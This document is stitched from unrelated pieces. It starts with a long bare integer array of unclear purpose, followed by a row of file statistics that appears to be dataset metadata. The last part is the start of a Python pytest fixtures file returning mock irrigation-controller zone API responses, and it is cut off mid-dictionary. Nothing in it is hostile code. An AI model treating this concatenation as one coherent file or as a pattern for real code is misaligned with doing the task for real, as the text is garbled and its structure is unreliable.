2903, 5555, 5600, 5636, 5664, 2991, 5561, 5606,
5642, 5670, 5691, 3068, 5566, 5611, 5647, 5675,
5696, 5711, 3134, 3183, 3184, 3185, 3186, 3187,
3188, 3189, 260, 2574, 5532, 2695, 5541, 5586,
2805, 5549, 5594, 5630, 2904, 5556, 5601, 5637,
5665, 2992, 5562, 5607, 5643, 5671, 5692, 3069,
5567, 5612, 5648, 5676, 5697, 5712, 3135, 5571,
5616, 5652, 5680, 5701, 5716, 5726, 3190, 3227,
3228, 3229, 3230, 3231, 3232, 3233, 3234, 272,
2575, 5533, 2696, 5542, 5587, 2806, 5550, 5595,
5631, 2905, 5557, 5602, 5638, 5666, 2993, 5563,
5608, 5644, 5672, 5693, 3070, 5568, 5613, 5649,
5677, 5698, 5713, 3136, 5572, 5617, 5653, 5681,
5702, 5717, 5727, 3191, 5575, 5620, 5656, 5684,
5705, 5720, 5730, 5736, 3235, 3260, 3261, 3262,
3263, 3264, 3265, 3266, 3267, 3268, 284, 287,
2270, 288, 2271, 2281, 289, 2272, 2282, 2291,
290, 2273, 2283, 2292, 2300, 291, 2274, 2284,
2293, 2301, 2308, 292, 2275, 2285, 2294, 2302,
2309, 2315, 293, 2276, 2286, 2295, 2303, 2310,
2316, 2321, 294, 2277, 2287, 2296, 2304, 2311,
2317, 2322, 2326, 295, 2278, 2288, 2297, 2305,
2312, 2318, 2323, 2327, 2330, 296, 131, 132,
133, 134, 135, 136, 137, 138, 139, 140,
21, 1619, 2477, 1685, 33, 1629, 3334, 3554,
1695, 2488, 3774, 2609, 1751, 1761, 45, 1638,
3343, 3563, 1704, 3388, 6192, 3608, 3783, 3828,
1770, 2499, 3994, 2620, 4003, 4048, 2730, 1817,
1827, 1836, 57, 1646, 3351, 3571, 1712, 3396,
6200, 3616, 3791, 3836, 1778, 3432, 6236, 3652,
6356, 6684, 3872, 4011, 4056, 4092, 1844, 2510,
4214, 2631, 4223, 4268, 2741, 4231, 4276, 4312,
2840, 1883, 1893, 1902, 1910, 69, 1653, 3358,
3578, 1719, 3403, 6207, 3623, 3798, 3843, 1785,
3439, 6243, 3659, 6363, 6691, 3879, 4018, 4063,
4099, 1851, 3467, 6271, 3687, 6391, 6719, 3907,
6475, 6803, 7012, 4127, 4238, 4283, 4319, 4347,
1917, 2521, 4434, 2642, 4443, 4488, 2752, 4451,
4496, 4532, 2851, 4458, 4503, 4539, 4567, 2939,
1949, 1959, 1968, 1976, 1983, 81, 1659, 3364,
3584, 1725, 3409, 6213, 3629, 3804, 3849, 1791,
3445, 6249, 3665, 6369, 6697, 3885, 4024, 4069,
4105, 1857, 3473, 6277, 3693, 6397, 6725, 3913,
6481, 6809, 7018, 4133, 4244, 4289, 4325, 4353,
1923, 3494, 6298, 3714, 6418, 6746, 3934, 6502,
6830, 7039, 4154, 6558, 6886, 7095, 7220, 4374,
4464, 4509, 4545, 4573, 4594, 1989, 2532, 4654,
2653, 4663, 4708, 2763, 4671, 4716, 4752, 2862,
4678, 4723, 4759, 4787, 2950, 4684, 4729, 4765,
4793, 4814, 3027, 2015, 2025, 2034, 2042, 2049,
2055, 93, 1664, 3369, 3589, 1730, 3414, 6218,
3634, 3809, 3854, 1796, 3450, 6254, 3670, 6374,
6702, 3890, 4029, 4074, 4110, 1862, 3478, 6282,
3698, 6402, 6730, 3918, 6486, 6814, 7023, 4138,
4249, 4294, 4330, 4358, 1928, 3499, 6303, 3719,
6423, 6751, 3939, 6507, 6835, 7044, 4159, 6563,
6891, 7100, 7225, 4379, 4469, 4514, 4550, 4578,
4599, 1994, 3514, 6318, 3734, 6438, 6766, 3954,
6522, 6850, 7059, 4174, 6578, 6906, 7115, 7240,
4394, 6613, 6941, 7150, 7275, 7344, 4614, 4689,
4734, 4770, 4798, 4819, 4834, 2060, 2543, 4874,
2664, 4883, 4928, 2774, 4891, 4936, 4972, 2873,
4898, 4943, 4979, 5007, 2961, 4904, 4949, 4985,
5013, 5034, 3038, 4909, 4954, 4990, 5018, 5039,
5054, 3104, 2081, 2091, 2100, 2108, 2115, 2121,
2126, 105, 1668, 3373, 3593, 1734, 3418, 6222,
3638, 3813, 3858, 1800, 3454, 6258, 3674, 6378,
6706, 3894, 4033, 4078, 4114, 1866, 3482, 6286,
3702, 6406, 6734, 3922, 6490, 6818, 7027, 4142,
4253, 4298, 4334, 4362, 1932, 3503, 6307, 3723,
6427, 6755, 3943, 6511, 6839, 7048, 4163, 6567,
6895, 7104, 7229, 4383, 4473, 4518, 4554, 4582,
4603, 1998, 3518, 6322, 3738, 6442, 6770, 3958,
6526, 6854, 7063, 4178, 6582, 6910, 7119, 7244,
4398, 6617, 6945, 7154, 7279, 7348, 4618, 4693,
4738, 4774, 4802, 4823, 4838, 2064, 3528, 6332,
3748, 6452, 6780, 3968, 6536, 6864, 7073, 4188,
6592, 6920, 7129, 7254, 4408, 6627, 6955, 7164,
7289, 7358, 4628, 6647, 6975, 7184, 7309, 7378,
7412, 4848, 4913, 4958, 4994, 5022, 5043, 5058,
5068, 2130, 2554, 5094, 2675, 5103, 5148, 2785,
5111, 5156, 5192, 2884, 5118, 5163, 5199, 5227,
2972, 5124, 5169, 5205, 5233, 5254, 3049, 5129,
5174, 5210, 5238, 5259, 5274, 3115, 5133, 5178,
5214, 5242, 5263, 5278, 5288, 3170, 2147, 2157,
2166, 2174, 2181, 2187, 2192, 2196, 117, 1671,
3376, 3596, 1737, 3421, 6225, 3641, 3816, 3861,
1803, 3457, 6261, 3677, 6381, 6709, 3897, 4036,
4081, 4117, 1869, 3485, 6289, 3705, 6409, 6737,
3925, 6493, 6821, 7030, 4145, 4256, 4301, 4337,
4365, 1935, 3506, 6310, 3726, 6430, 6758, 3946,
6514, 6842, 7051, 4166, 6570, 6898, 7107, 7232,
4386, 4476, 4521, 4557, 4585, 4606, 2001, 3521,
6325, 3741, 6445, 6773, 3961, 6529, 6857, 7066,
4181, 6585, 6913, 7122, 7247, 4401, 6620, 6948,
7157, 7282, 7351, 4621, 4696, 4741, 4777, 4805,
4826, 4841, 2067, 3531, 6335, 3751, 6455, 6783,
3971, 6539, 6867, 7076, 4191, 6595, 6923, 7132,
7257, 4411, 6630, 6958, 7167, 7292, 7361, 4631,
6650, 6978, 7187, 7312, 7381, 7415, 4851, 4916,
4961, 4997, 5025, 5046, 5061, 5071, 2133, 3537,
6341, 3757, 6461, 6789, 3977, 6545, 6873, 7082,
4197, 6601, 6929, 7138, 7263, 4417, 6636, 6964,
7173, 7298, 7367, 4637, 6656, 6984, 7193, 7318,
7387, 7421, 4857, 6666, 6994, 7203, 7328, 7397,
7431, 7445, 5077, 5136, 5181, 5217, 5245, 5266,
5281, 5291, 5297, 2199, 2565, 5314, 2686, 5323,
5368, 2796, 5331, 5376, 5412, 2895, 5338, 5383,
5419, 5447, 2983, 5344, 5389, 5425, 5453, 5474,
3060, 5349, 5394, 5430, 5458, 5479, 5494, 3126,
5353, 5398, 5434, 5462, 5483, 5498, 5508, 3181,
5356, 5401, 5437, 5465, 5486, 5501, 5511, 5517,
3225, 2213, 2223, 2232, 2240, 2247, 2253, 2258,
2262, 2265, 129, 1673, 3378, 3598, 1739, 3423,
6227, 3643, 3818, 3863, 1805, 3459, 6263, 3679,
6383, 6711, 3899, 4038, 4083, 4119, 1871, 3487,
6291, 3707, 6411, 6739, 3927, 6495, 6823, 7032,
4147, 4258, 4303, 4339, 4367, 1937, 3508, 6312,
3728, 6432, 6760, 3948, 6516, 6844, 7053, 4168,
6572, 6900, 7109, 7234, 4388, 4478, 4523, 4559,
4587, 4608, 2003, 3523, 6327, 3743, 6447, 6775,
3963, 6531, 6859, 7068, 4183, 6587, 6915, 7124,
7249, 4403, 6622, 6950, 7159, 7284, 7353, 4623,
4698, 4743, 4779, 4807, 4828, 4843, 2069, 3533,
6337, 3753, 6457, 6785, 3973, 6541, 6869, 7078,
4193, 6597, 6925, 7134, 7259, 4413, 6632, 6960,
7169, 7294, 7363, 4633, 6652, 6980, 7189, 7314,
7383, 7417, 4853, 4918, 4963, 4999, 5027, 5048,
5063, 5073, 2135, 3539, 6343, 3759, 6463, 6791,
3979, 6547, 6875, 7084, 4199, 6603, 6931, 7140,
7265, 4419, 6638, 6966, 7175, 7300, 7369, 4639,
6658, 6986, 7195, 7320, 7389, 7423, 4859, 6668,
6996, 7205, 7330, 7399, 7433, 7447, 5079, 5138,
5183, 5219, 5247, 5268, 5283, 5293, 5299, 2201,
1609, 1609, 3762, 1609, 6794, 3982, 1609, 6878,
7087, 4202, 1609, 6934, 7143, 7268, 4422, 1609,
6969, 7178, 7303, 7372, 4642, 1609, 6989, 7198,
7323, 7392, 7426, 4862, 1609, 6999, 7208, 7333,
7402, 7436, 7450, 5082, 1608, 1608, 1608, 1608,
1608, 1608, 1608, 1607, 1608, 1609, 5403, 5439,
5467, 5488, 5503, 5513, 5519, 1608, 2267, 2576,
5534, 2697, 5543, 5588, 2807, 5551, 5596, 5632,
2906, 5558, 5603, 5639, 5667, 2994, 5564, 5609,
5645, 5673, 5694, 3071, 5569, 5614, 5650, 5678,
5699, 5714, 3137, 5573, 5618, 5654, 5682, 5703,
5718, 5728, 3192, 5576, 5621, 5657, 5685, 5706,
5721, 5731, 5737, 3236, 1609, 5623, 5659, 5687,
5708, 5723, 5733, 5739, 1608, 3269, 2279, 2289,
2298, 2306, 2313, 2319, 2324, 2328, 2331, 2333,
141, 177, 2578, 2699, 189, 2579, 5746, 2700,
2809, 2810, 201, 2580, 5747, 2701, 5756, 5801,
2811, 2908, 2909, 2910, 213, 2581, 5748, 2702,
5757, 5802, 2812, 5765, 5810, 5846, 2911, 2996,
2997, 2998, 2999, 225, 2582, 5749, 2703, 5758,
5803, 2813, 5766, 5811, 5847, 2912, 5773, 5818,
5854, 5882, 3000, 3073, 3074, 3075, 3076, 3077,
237, 2583, 5750, 2704, 5759, 5804, 2814, 5767,
5812, 5848, 2913, 5774, 5819, 5855, 5883, 3001,
5780, 5825, 5861, 5889, 5910, 3078, 3139, 3140,
3141, 3142, 3143, 3144, 249, 2584, 5751, 2705,
5760, 5805, 2815, 5768, 5813, 5849, 2914, 5775,
5820, 5856, 5884, 3002, 5781, 5826, 5862, 5890,
5911, 3079, 5786, 5831, 5867, 5895, 5916, 5931,
3145, 3194, 3195, 3196, 3197, 3198, 3199, 3200,
261, 2585, 5752, 2706, 5761, 5806, 2816, 5769,
5814, 5850, 2915, 5776, 5821, 5857, 5885, 3003,
5782, 5827, 5863, 5891, 5912, 3080, 5787, 5832,
5868, 5896, 5917, 5932, 3146, 5791, 5836, 5872,
5900, 5921, 5936, 5946, 3201, 3238, 3239, 3240,
3241, 3242, 3243, 3244, 3245, 273, 2586, 5753,
2707, 5762, 5807, 2817, 5770, 5815, 5851, 2916,
5777, 5822, 5858, 5886, 3004, 5783, 5828, 5864,
5892, 5913, 3081, 5788, 5833, 5869, 5897, 5918,
5933, 3147, 5792, 5837, 5873, 5901, 5922, 5937,
5947, 3202, 5795, 5840, 5876, 5904, 5925, 5940,
5950, 5956, 3246, 3271, 3272, 3273, 3274, 3275,
3276, 3277, 3278, 3279, 285, 2587, 5754, 2708,
5763, 5808, 2818, 5771, 5816, 5852, 2917, 5778,
5823, 5859, 5887, 3005, 5784, 5829, 5865, 5893,
5914, 3082, 5789, 5834, 5870, 5898, 5919, 5934,
3148, 5793, 5838, 5874, 5902, 5923, 5938, 5948,
3203, 5796, 5841, 5877, 5905, 5926, 5941, 5951,
5957, 3247, 1609, 5843, 5879, 5907, 5928, 5943,
5953, 5959, 1608, 3280, 3293, 3294, 3295, 3296,
3297, 3298, 3299, 3300, 3301, 3302, 297, 299,
2336, 300, 2337, 2347, 301, 2338, 2348, 2357,
302, 2339, 2349, 2358, 2366, 303, 2340, 2350,
2359, 2367, 2374, 304, 2341, 2351, 2360, 2368,
2375, 2381, 305, 2342, 2352, 2361, 2369, 2376,
2382, 2387, 306, 2343, 2353, 2362, 2370, 2377,
2383, 2388, 2392, 307, 2344, 2354, 2363, 2371,
2378, 2384, 2389, 2393, 2396, 308, 2345, 2355,
2364, 2372, 2379, 2385, 2390, 2394, 2397, 2399,
309, 143, 144, 145, 146, 147, 148, 149,
150, 151, 152, 153, 22, 178, 2478, 190,
34, 178, 2589, 2710, 190, 2489, 2820, 2610,
202, 202, 46, 178, 2589, 2710, 190, 2590,
5966, 2711, 2820, 2821, 202, 2500, 2919, 2621,
2919, 2920, 2731, 214, 214, 214, 58, 178,
2589, 2710, 190, 2590, 5966, 2711, 2820, 2821,
202, 2591, 5967, 2712, 5976, 6021, 2822, 2919,
2920, 2921, 214, 2511, 3007, 2632, 3007, 3008,
2742, 3007, 3008, 3009, 2841, 226, 226, 226,
226, 70, 178, 2589, 2710, 190, 2590, 5966,
2711, 2820, 2821, 202, 2591, 5967, 2712, 5976,
6021, 2822, 2919, 2920, 2921, 214, 2592, 5968,
2713, 5977, 6022, 2823, 5985, 6030, 6066, 2922,
3007, 3008, 3009, 3010, 226, 2522, 3084, 2643,
3084, 3085, 2753, 3084, 3085, 3086, 2852, 3084,
3085, 3086, 3087, 2940, 238, 238, 238, 238,
238, 82, 178, 2589, 2710, 190, 2590, 5966,
2711, 2820, 2821, 202, 2591, 5967, 2712, 5976,
6021, 2822, 2919, 2920, 2921, 214, 2592, 5968,
2713, 5977, 6022, 2823, 5985, 6030, 6066, 2922,
3007, 3008, 3009, 3010, 226, 2593, 5969, 2714,
5978, 6023, 2824, 5986, 6031, 6067, 2923, 5993,
6038, 6074, 6102, 3011, 3084, 3085, 3086, 3087,
3088, 238, 2533, 3150, 2654, 3150, 3151, 2764,
3150, 3151, 3152, 2863, 3150, 3151, 3152, 3153,
2951, 3150, 3151, 3152, 3153, 3154, 3028, 250,
250, 250, 250, 250, 250, 94, 178, 2589,
2710, 190, 2590, 5966, 2711, 2820, 2821, 202,
2591, 5967, 2712, 5976, 6021, 2822, 2919, 2920,
2921, 214, 2592, 5968, 2713, 5977, 6022, 2823,
5985, 6030, 6066, 2922, 3007, 3008, 3009, 3010,
226, 2593, 5969, 2714, 5978, 6023, 2824, 5986,
6031, 6067, 2923, 5993, 6038, 6074, 6102, 3011,
3084, 3085, 3086, 3087, 3088, 238, 2594, 5970,
2715, 5979, 6024, 2825, 5987, 6032, 6068, 2924,
5994, 6039, 6075, 6103, 3012, 6000, 6045, 6081,
6109, 6130, 3089, 3150, 3151, 3152, 3153, 3154,
3155, 250, 2544, 3205, 2665, 3205, 3206, 2775,
3205, 3206, 3207, 2874, 3205, 3206, 3207, 3208,
2962, 3205, 3206, 3207, 3208, 3209, 3039, 3205,
3206, 3207, 3208, 3209, 3210, 3105, 262, 262,
262, 262, 262, 262, 262, 106, 178, 2589,
2710, 190, 2590, 5966, 2711, 2820, 2821, 202,
2591, 5967, 2712, 5976, 6021, 2822, 2919, 2920,
2921, 214, 2592, 5968, 2713, 5977, 6022, 2823,
5985, 6030, 6066, 2922, 3007, 3008, 3009, 3010,
226, 2593, 5969, 2714, 5978, 6023, 2824, 5986,
6031, 6067, 2923, 5993, 6038, 6074, 6102, 3011,
3084, 3085, 3086, 3087, 3088, 238, 2594, 5970,
2715, 5979, 6024, 2825, 5987, 6032, 6068, 2924,
5994, 6039, 6075, 6103, 3012, 6000, 6045, 6081,
6109, 6130, 3089, 3150, 3151, 3152, 3153, 3154,
3155, 250, 2595, 5971, 2716, 5980, 6025, 2826,
5988, 6033, 6069, 2925, 5995, 6040, 6076, 6104,
3013, 6001, 6046, 6082, 6110, 6131, 3090, 6006,
6051, 6087, 6115, 6136, 6151, 3156, 3205, 3206,
3207, 3208, 3209, 3210, 3211, 262, 2555, 3249,
2676, 3249, 3250, 2786, 3249, 3250, 3251, 2885,
3249, 3250, 3251, 3252, 2973, 3249, 3250, 3251,
3252, 3253, 3050, 3249, 3250, 3251, 3252, 3253,
3254, 3116, 3249, 3250, 3251, 3252, 3253, 3254,
3255, 3171, 274, 274, 274, 274, 274, 274,
274, 274, 118, 178, 2589, 2710, 190, 2590,
5966, 2711, 2820, 2821, 202, 2591, 5967, 2712,
5976, 6021, 2822, 2919, 2920, 2921, 214, 2592,
5968, 2713, 5977, 6022, 2823, 5985, 6030, 6066,
2922, 3007, 3008, 3009, 3010, 226, 2593, 5969,
2714, 5978, 6023, 2824, 5986, 6031, 6067, 2923,
5993, 6038, 6074, 6102, 3011, 3084, 3085, 3086,
3087, 3088, 238, 2594, 5970, 2715, 5979, 6024,
2825, 5987, 6032, 6068, 2924, 5994, 6039, 6075,
6103, 3012, 6000, 6045, 6081, 6109, 6130, 3089,
3150, 3151, 3152, 3153, 3154, 3155, 250, 2595,
5971, 2716, 5980, 6025, 2826, 5988, 6033, 6069,
2925, 5995, 6040, 6076, 6104, 3013, 6001, 6046,
6082, 6110, 6131, 3090, 6006, 6051, 6087, 6115,
6136, 6151, 3156, 3205, 3206, 3207, 3208, 3209,
3210, 3211, 262, 2596, 5972, 2717, 5981, 6026,
2827, 5989, 6034, 6070, 2926, 5996, 6041, 6077,
6105, 3014, 6002, 6047, 6083, 6111, 6132, 3091,
6007, 6052, 6088, 6116, 6137, 6152, 3157, 6011,
6056, 6092, 6120, 6141, 6156, 6166, 3212, 3249,
3250, 3251, 3252, 3253, 3254, 3255, 3256, 274,
2566, 3282, 2687, 3282, 3283, 2797, 3282, 3283,
3284, 2896, 3282, 3283, 3284, 3285, 2984, 3282,
3283, 3284, 3285, 3286, 3061, 3282, 3283, 3284,
3285, 3286, 3287, 3127, 3282, 3283, 3284, 3285,
3286, 3287, 3288, 3182, 3282, 3283, 3284, 3285,
3286, 3287, 3288, 3289, 3226, 286, 286, 286,
286, 286, 286, 286, 286, 286, 130, 178,
2589, 2710, 190, 2590, 5966, 2711, 2820, 2821,
202, 2591, 5967, 2712, 5976, 6021, 2822, 2919,
2920, 2921, 214, 2592, 5968, 2713, 5977, 6022,
2823, 5985, 6030, 6066, 2922, 3007, 3008, 3009,
3010, 226, 2593, 5969, 2714, 5978, 6023, 2824,
5986, 6031, 6067, 2923, 5993, 6038, 6074, 6102,
3011, 3084, 3085, 3086, 3087, 3088, 238, 2594,
5970, 2715, 5979, 6024, 2825, 5987, 6032, 6068,
2924, 5994, 6039, 6075, 6103, 3012, 6000, 6045,
6081, 6109, 6130, 3089, 3150, 3151, 3152, 3153,
3154, 3155, 250, 2595, 5971, 2716, 5980, 6025,
2826, 5988, 6033, 6069, 2925, 5995, 6040, 6076,
6104, 3013, 6001, 6046, 6082, 6110, 6131, 3090,
6006, 6051, 6087, 6115, 6136, 6151, 3156, 3205,
3206, 3207, 3208, 3209, 3210, 3211, 262, 2596,
5972, 2717, 5981, 6026, 2827, 5989, 6034, 6070,
2926, 5996, 6041, 6077, 6105, 3014, 6002, 6047,
6083, 6111, 6132, 3091, 6007, 6052, 6088, 6116,
6137, 6152, 3157, 6011, 6056, 6092, 6120, 6141,
6156, 6166, 3212, 3249, 3250, 3251, 3252, 3253,
3254, 3255, 3256, 274, 2597, 5973, 2718, 5982,
6027, 2828, 5990, 6035, 6071, 2927, 5997, 6042,
6078, 6106, 3015, 6003, 6048, 6084, 6112, 6133,
3092, 6008, 6053, 6089, 6117, 6138, 6153, 3158,
6012, 6057, 6093, 6121, 6142, 6157, 6167, 3213,
6015, 6060, 6096, 6124, 6145, 6160, 6170, 6176,
3257, 3282, 3283, 3284, 3285, 3286, 3287, 3288,
3289, 3290, 286, 2577, 3304, 2698, 3304, 3305,
2808, 3304, 3305, 3306, 2907, 3304, 3305, 3306,
3307, 2995, 3304, 3305, 3306, 3307, 3308, 3072,
3304, 3305, 3306, 3307, 3308, 3309, 3138, 3304,
3305, 3306, 3307, 3308, 3309, 3310, 3193, 3304,
3305, 3306, 3307, 3308, 3309, 3310, 3311, 3237,
3304, 3305, 3306, 3307, 3308, 3309, 3310, 3311,
3312, 3270, 298, 298, 298, 298, 298, 298,
298, 298, 298, 298, 142, 178, 2589, 2710,
190, 2590, 5966, 2711, 2820, 2821, 202, 2591,
5967, 2712, 5976, 6021, 2822, 2919, 2920, 2921,
214, 2592, 5968, 2713, 5977, 6022, 2823, 5985,
6030, 6066, 2922, 3007, 3008, 3009, 3010, 226,
2593, 5969, 2714, 5978, 6023, 2824, 5986, 6031,
6067, 2923, 5993, 6038, 6074, 6102, 3011, 3084,
3085, 3086, 3087, 3088, 238, 2594, 5970, 2715,
5979, 6024, 2825, 5987, 6032, 6068, 2924, 5994,
6039, 6075, 6103, 3012, 6000, 6045, 6081, 6109,
6130, 3089, 3150, 3151, 3152, 3153, 3154, 3155,
250, 2595, 5971, 2716, 5980, 6025, 2826, 5988,
6033, 6069, 2925, 5995, 6040, 6076, 6104, 3013,
6001, 6046, 6082, 6110, 6131, 3090, 6006, 6051,
6087, 6115, 6136, 6151, 3156, 3205, 3206, 3207,
3208, 3209, 3210, 3211, 262, 2596, 5972, 2717,
5981, 6026, 2827, 5989, 6034, 6070, 2926, 5996,
6041, 6077, 6105, 3014, 6002, 6047, 6083, 6111,
6132, 3091, 6007, 6052, 6088, 6116, 6137, 6152,
3157, 6011, 6056, 6092, 6120, 6141, 6156, 6166,
3212, 3249, 3250, 3251, 3252, 3253, 3254, 3255,
3256, 274, 2597, 5973, 2718, 5982, 6027, 2828,
5990, 6035, 6071, 2927, 5997, 6042, 6078, 6106,
3015, 6003, 6048, 6084, 6112, 6133, 3092, 6008,
6053, 6089, 6117, 6138, 6153, 3158, 6012, 6057,
6093, 6121, 6142, 6157, 6167, 3213, 6015, 6060,
6096, 6124, 6145, 6160, 6170, 6176, 3257, 3282,
3283, 3284, 3285, 3286, 3287, 3288, 3289, 3290,
286, 2598, 5974, 2719, 5983, 6028, 2829, 5991,
6036, 6072, 2928, 5998, 6043, 6079, 6107, 3016,
6004, 6049, 6085, 6113, 6134, 3093, 6009, 6054,
6090, 6118, 6139, 6154, 3159, 6013, 6058, 6094,
6122, 6143, 6158, 6168, 3214, 6016, 6061, 6097,
6125, 6146, 6161, 6171, 6177, 3258, 1609, 6063,
6099, 6127, 6148, 6163, 6173, 6179, 1608, 3291,
3304, 3305, 3306, 3307, 3308, 3309, 3310, 3311,
3312, 3313, 298, 2588, 3315, 2709, 3315, 3316,
2819, 3315, 3316, 3317, 2918, 3315, 3316, 3317,
3318, 3006, 3315, 3316, 3317, 3318, 3319, 3083,
3315, 3316, 3317, 3318, 3319, 3320, 3149, 3315,
3316, 3317, 3318, 3319, 3320, 3321, 3204, 3315,
3316, 3317, 3318, 3319, 3320, 3321, 3322, 3248,
3315, 3316, 3317, 3318, 3319, 3320, 3321, 3322,
3323, 3281, 3315, 3316, 3317, 3318, 3319, 3320,
3321, 3322, 3323, 3324, 3303, 310, 310, 310,
310, 310, 310, 310, 310, 310, 310, 310,
154, 178, 311, 312, 190, 311, 2402, 312,
313, 313, 202, 311, 2402, 312, 2403, 2413,
313, 314, 314, 314, 214, 311, 2402, 312,
2403, 2413, 313, 2404, 2414, 2423, 314, 315,
315, 315, 315, 226, 311, 2402, 312, 2403,
2413, 313, 2404, 2414, 2423, 314, 2405, 2415,
2424, 2432, 315, 316, 316, 316, 316, 316,
238, 311, 2402, 312, 2403, 2413, 313, 2404,
2414, 2423, 314, 2405, 2415, 2424, 2432, 315,
2406, 2416, 2425, 2433, 2440, 316, 317, 317,
317, 317, 317, 317, 250, 311, 2402, 312,
2403, 2413, 313, 2404, 2414, 2423, 314, 2405,
2415, 2424, 2432, 315, 2406, 2416, 2425, 2433,
2440, 316, 2407, 2417, 2426, 2434, 2441, 2447,
317, 318, 318, 318, 318, 318, 318, 318,
262, 311, 2402, 312, 2403, 2413, 313, 2404,
2414, 2423, 314, 2405, 2415, 2424, 2432, 315,
2406, 2416, 2425, 2433, 2440, 316, 2407, 2417,
2426, 2434, 2441, 2447, 317, 2408, 2418, 2427,
2435, 2442, 2448, 2453, 318, 319, 319, 319,
319, 319, 319, 319, 319, 274, 311, 2402,
312, 2403, 2413, 313, 2404, 2414, 2423, 314,
2405, 2415, 2424, 2432, 315, 2406, 2416, 2425,
2433, 2440, 316, 2407, 2417, 2426, 2434, 2441,
2447, 317, 2408, 2418, 2427, 2435, 2442, 2448,
2453, 318, 2409, 2419, 2428, 2436, 2443, 2449,
2454, 2458, 319, 320, 320, 320, 320, 320,
320, 320, 320, 320, 286, 311, 2402, 312,
2403, 2413, 313, 2404, 2414, 2423, 314, 2405,
2415, 2424, 2432, 315, 2406, 2416, 2425, 2433,
2440, 316, 2407, 2417, 2426, 2434, 2441, 2447,
317, 2408, 2418, 2427, 2435, 2442, 2448, 2453,
318, 2409, 2419, 2428, 2436, 2443, 2449, 2454,
2458, 319, 2410, 2420, 2429, 2437, 2444, 2450,
2455, 2459, 2462, 320, 321, 321, 321, 321,
321, 321, 321, 321, 321, 321, 298, 311,
2402, 312, 2403, 2413, 313, 2404, 2414, 2423,
314, 2405, 2415, 2424, 2432, 315, 2406, 2416,
2425, 2433, 2440, 316, 2407, 2417, 2426, 2434,
2441, 2447, 317, 2408, 2418, 2427, 2435, 2442,
2448, 2453, 318, 2409, 2419, 2428, 2436, 2443,
2449, 2454, 2458, 319, 2410, 2420, 2429, 2437,
2444, 2450, 2455, 2459, 2462, 320, 2411, 2421,
2430, 2438, 2445, 2451, 2456, 2460, 2463, 2465,
321, 322, 322, 322, 322, 322, 322, 322,
322, 322, 322, 322, 310, 155, 155, 156,
155, 156, 157, 155, 156, 157, 158, 155,
156, 157, 158, 159, 155, 156, 157, 158,
159, 160, 155, 156, 157, 158, 159, 160,
161, 155, 156, 157, 158, 159, 160, 161,
162, 155, 156, 157, 158, 159, 160, 161,
162, 163, 155, 156, 157, 158, 159, 160,
161, 162, 163, 164, 155, 156, 157, 158,
159, 160, 161, 162, 163, 164, 165, 155,
156, 157, 158, 159, 160, 161, 162, 163,
164, 165, 166,
]
| 50.440972 | 51 | 0.604108 | 18,403 | 116,216 | 3.814867 | 0.26061 | 0.000855 | 0.001253 | 0.001567 | 0.869212 | 0.857047 | 0.84353 | 0.833901 | 0.826708 | 0.818916 | 0 | 0.791958 | 0.237523 | 116,216 | 2,303 | 52 | 50.462875 | 0.000316 | 0.000224 | 0 | 0.147698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
43423da53aa44f533384081c1276ecbe26fcd6bc | 4,755 | py | Python | tests/fixtures/zone.py | peterg79/regenmaschine | 3b76fb42c34d6d655d8e793bca4cfcf21c858123 | [
"MIT"
] | null | null | null | tests/fixtures/zone.py | peterg79/regenmaschine | 3b76fb42c34d6d655d8e793bca4cfcf21c858123 | [
"MIT"
] | null | null | null | tests/fixtures/zone.py | peterg79/regenmaschine | 3b76fb42c34d6d655d8e793bca4cfcf21c858123 | [
"MIT"
] | null | null | null | """Define fixtures related to the "zone" endpoint."""
import pytest
@pytest.fixture()
def zone_id_properties_json():
"""Return a /zone/<ID>/properties response."""
return {
"uid": 1,
"name": "Landscaping",
"valveid": 1,
"ETcoef": 0.80000000000000004,
"active": True,
"type": 4,
"internet": True,
"savings": 100,
"slope": 1,
"sun": 1,
"soil": 5,
"group_id": 4,
"history": True,
"master": False,
"before": 0,
"after": 0,
"waterSense": {
"fieldCapacity": 0.17000000000000001,
"rootDepth": 229,
"minRuntime": -1,
"appEfficiency": 0.75,
"isTallPlant": True,
"permWilting": 0.029999999999999999,
"allowedSurfaceAcc": 8.3800000000000008,
"maxAllowedDepletion": 0.5,
"precipitationRate": 25.399999999999999,
"currentFieldCapacity": 16.030000000000001,
"area": 92.900001525878906,
"referenceTime": 1243,
"detailedMonthsKc": [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
"flowrate": None,
"soilIntakeRate": 10.16,
},
"customSoilPreset": None,
"customVegetationPreset": None,
"customSprinklerPreset": None,
}
@pytest.fixture()
def zone_post_json():
"""Return a /zone (POST) response."""
return {"statusCode": 0, "message": "OK"}
@pytest.fixture()
def zone_properties_json():
"""Return a /zone/properties response."""
return {
"zones": [
{
"uid": 1,
"name": "Landscaping",
"valveid": 1,
"ETcoef": 0.80000000000000004,
"active": True,
"type": 4,
"internet": True,
"savings": 100,
"slope": 1,
"sun": 1,
"soil": 5,
"group_id": 4,
"history": True,
"master": False,
"before": 0,
"after": 0,
"waterSense": {
"fieldCapacity": 0.17000000000000001,
"rootDepth": 229,
"minRuntime": -1,
"appEfficiency": 0.75,
"isTallPlant": True,
"permWilting": 0.029999999999999999,
"allowedSurfaceAcc": 8.3800000000000008,
"maxAllowedDepletion": 0.5,
"precipitationRate": 25.399999999999999,
"currentFieldCapacity": 16.030000000000001,
"area": 92.900001525878906,
"referenceTime": 1243,
"detailedMonthsKc": [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0],
"flowrate": None,
"soilIntakeRate": 10.16,
},
"customSoilPreset": None,
"customVegetationPreset": None,
"customSprinklerPreset": None,
},
{
"uid": 2,
"name": "Flower Bed",
"valveid": 1,
"ETcoef": 0.80000000000000004,
"active": False,
"type": 4,
"internet": True,
"savings": 100,
"slope": 1,
"sun": 1,
"soil": 5,
"group_id": 4,
"history": True,
"master": False,
"before": 0,
"after": 0,
"waterSense": {
"fieldCapacity": 0.17000000000000001,
"rootDepth": 229,
"minRuntime": -1,
"appEfficiency": 0.75,
"isTallPlant": True,
"permWilting": 0.029999999999999999,
